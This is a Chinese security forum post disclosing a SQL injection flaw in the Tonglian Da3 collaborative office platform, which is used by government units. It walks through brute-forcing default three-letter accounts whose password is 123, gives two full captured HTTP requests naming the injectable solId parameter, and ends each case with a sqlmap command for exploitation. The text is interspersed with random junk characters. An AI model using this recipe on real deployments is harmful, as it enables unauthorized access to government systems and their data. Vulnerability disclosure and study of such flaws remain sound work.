找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2093|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' _# U' U& t+ z: I% A
9 c9 A0 r' M$ N& I

* x' z. W4 D, ?8 V! ], l

0 @6 [; n0 t' s/ ~+ U$ s 平台简介:6 l3 t# ~+ H/ \8 [# V; c3 d

5 Z1 m: f1 i# v

3 Q) Y- r/ k3 V# b& R   1 L5 ~. v+ G/ s8 {4 }) H* k) N

! H- j& C0 v) z* H! ?

* r* w) U% C0 F 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
* C( w% R& F$ P9 g2 G 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) t# W9 E6 L2 S* r' @0 g( t7 U同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!5 Q$ n0 Q* E8 m

3 {7 \2 k! w" ~+ J

2 V3 E( e$ A8 T( N5 Y8 i   9 p n' V- t# Q

/ w2 G$ c# t) H

9 p, @8 V. Q$ S$ H 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: % m; W) J+ f# P7 L: _9 q/ B& x* T8 G

; A/ C# X, d; {/ F8 c

) | K7 e5 q# ]8 i, z. Z9 h( _8 t8 x   5 M7 w$ H. g: A! g. @' a

0 [0 r0 [. X- D* j3 f, S( j0 @- T

$ q9 M. C$ o. m; n2 H* A http://1.1.1.1:7197/cap-aco/#(案例2-) ; y+ `1 c5 S: ]

) q, v% e- x6 v* J" n ~

( {6 A1 z5 K" E- K: ]' m. K http://www.XXOO.com (案例1-官网网站)4 j# \; G4 N% b! W. q$ W D9 `& f

9 V' v% C6 W) {

# g$ S0 d. J' W! b8 w9 Q   / T+ I6 a% H+ k) D7 k" k! s3 ^. C

3 R! ]+ ]. `4 x, Z; k3 M

; {1 E# X0 d$ f$ o& v) M. }( b: ]( h1 j 漏洞详情: M1 I) I* T* l" P. h9 D3 X. ?' y

& F$ v1 a6 D: u0 G, Z

9 B7 C2 U* {4 b3 F* y  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 2 e! w* W% _; l) T

- \( b4 u: F2 m; }# U

6 y7 E9 p4 `" D9 G      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:% b C& b' A. _% p! s, {3 u

0 F8 w: N( D/ i

, k1 u* Q! f4 t1 v! w. Q   0 M" P* i0 c1 V; }

+ B$ J' |- q/ R) H- ~. }

. l1 Y9 [: F* F0 [6 x   ! Q! `8 s0 L0 R0 E

- |$ D, ^6 {( d. M$ h$ d

- c& Y U% }" j) Y status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: ! o4 C+ O7 ?4 X% |

9 H7 e: A" p6 k% o6 O# v7 N5 G. h

% d3 O# j" R" s 1、案例1-官方网站+ U0 t5 n" p Z, Y; h

7 K Y& c' M! [. Y5 N

& @- U; r3 ?0 Y, L7 F5 L GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 1 W. s- k/ y- `1 b2 o

% Y3 e, X5 L/ k! K9 N

0 B1 R4 G6 S2 P4 Y- L Host: www.XXOO.com, {* z' ^# U. ? y8 t

: K4 [ l" J0 [4 _/ b/ ?. ~

- s9 q$ o2 l7 T0 r. k Proxy-Connection: Keep-Alive 4 }% ^( s9 Y" n+ p& b# b$ F, U

. s# {3 L3 J. O% ]2 X

' `/ m: j2 u/ \* k: l9 Y$ w, Q Accept: application/json, text/javascript, */*; q=0.01 F4 ^ K9 j) Y n1 V `

0 V3 \9 B- ^$ y$ {; Y

8 u" Y" I' D+ ~) {: |7 X! [8 [ Accept-Language: zh-CN% R, T b0 B# O

* D, T2 k; j3 n

1 h( A/ ?. }- b# C) u* H& \ Content-Type: application/json7 v) {4 `- b2 F

3 }3 V' w( O" R& z& h+ |

% i2 i$ z8 C1 ?! t User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko8 Q" m/ [8 p1 [9 F+ ]8 L

9 }, o+ T- F. ?

, C! S# R# h! W+ u X-Requested-With: XMLHttpRequest. Y6 P3 b7 g" k7 T

9 B' B( P" I' n* V" \9 p9 L# r

0 L* c8 }6 r. g Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0028 x$ }+ N- m. C* Q6 r

7 n3 Y0 y) K _

]' t, |* m g. \2 p) q |3 J Accept-Encoding: gzip, deflate, sdch 0 D* \- p o# T" ^) c/ ], o5 Z

q+ L/ k A5 X( S( [ z& C$ G% Q

( }" N9 p v1 C. P1 R$ @; n9 `" z A Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e% w- i1 I! }5 O* t$ U

& S- T/ Z0 P& ?! o) v

* _% i; S9 y. D 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:. m: ]) V$ {: {( @* @

4 h" j0 K( |9 i7 F3 o" q

3 l/ I6 i* T" s4 `' o6 W   9 } H% g, o' _; F: p

4 b5 ^5 t- x# n! L2 I9 g

7 o) h5 W* a+ y4 P6 E* }   7 H: D4 }; G; j3 x5 l9 Y. f! i

+ A: K, J. Y$ s, _5 r }

% g8 C- s! ^7 s* J) T5 u   p) u6 p$ ~9 P1 G6 k

& B" ]" w }4 D

# H: b% Q7 R' u0 X5 e% |$ I9 Q' S   + W9 i& A" d7 B6 w( v

% a0 W N' K3 Q: @7 h% E; M

( I* C% j3 M5 r7 j# _  + {# N. d6 T6 n) G# J7 f

2 j% z3 o1 Z6 J e9 f u& J! s# ^

: X }# V* x9 L9 T/ U 2、案例2-某天河云平台 & w, l- ~1 ?+ ?4 ~& q

* T/ t3 I2 `9 X2 D9 w1 T( b) S( A' |

( e0 W7 i; F* I$ z) e5 M8 @ GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 ! h8 [& z% L6 f" Z7 b& x& v, `6 \

# s! h8 h9 b& R4 b" q% P3 m0 w

! u1 ]: h; c: q' i% ^7 b6 Q$ S Host: 1.1.1.:71979 q) @. }3 P2 t, V2 l) b" j# ~

, t, ~# B4 I8 c4 @4 A2 s

6 v7 \8 |8 \1 {1 l( o Accept: application/json, text/javascript, */*; q=0.01% ^( V+ T4 q2 p1 ?: _' F

& Z' n% d" C" h6 H

% R' M2 A& r# C8 P7 y X-Requested-With: XMLHttpRequest2 H, c( X# @$ g2 N" D+ K6 y4 ^

( E) [1 `. U& i3 M

2 ^. X& E: }* k. S4 M User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 ) X& d' a6 b# l

" w# y$ u% z W8 _( g* k) }

7 H0 M( V# S; e Content-Type: application/json / d* ?, C8 y# t! J5 P4 j

e. D: J" G7 ?$ k+ O) q9 `3 O

1 e+ x" [0 {, q Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 9 Q1 [5 k6 w6 I) p3 }2 }+ b$ Y

" C: j* K1 W9 h# L

% n M4 e* e9 g% ?2 T7 ] Accept-Language: zh-CN,zh;q=0.8 ( z1 H, {4 N$ s+ f' b

3 U$ s! ?: j# ^( h! K! Z

; e5 ] [8 X/ d6 O Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 $ M! q- t( f, ?0 b

9 y- k& y% q- x1 J8 p6 |% ^

9 }) h2 C: P8 K$ p" ^ Connection: close G9 q' B* [; x( {; U* _

* ~- K+ }1 E0 A+ X6 J; W6 h0 t

% u6 X! E: {8 i" C% Z) x. c+ P 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:/ d- P/ A5 E! a' L; Q

) k, c2 |" y# q# m+ k$ @

; R7 s! O" @& C& I! c   v- E* g% `3 c# |+ z

+ \+ e+ J0 [; H

# h" T& K3 V/ `
l* t0 g" n9 `! |! t

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表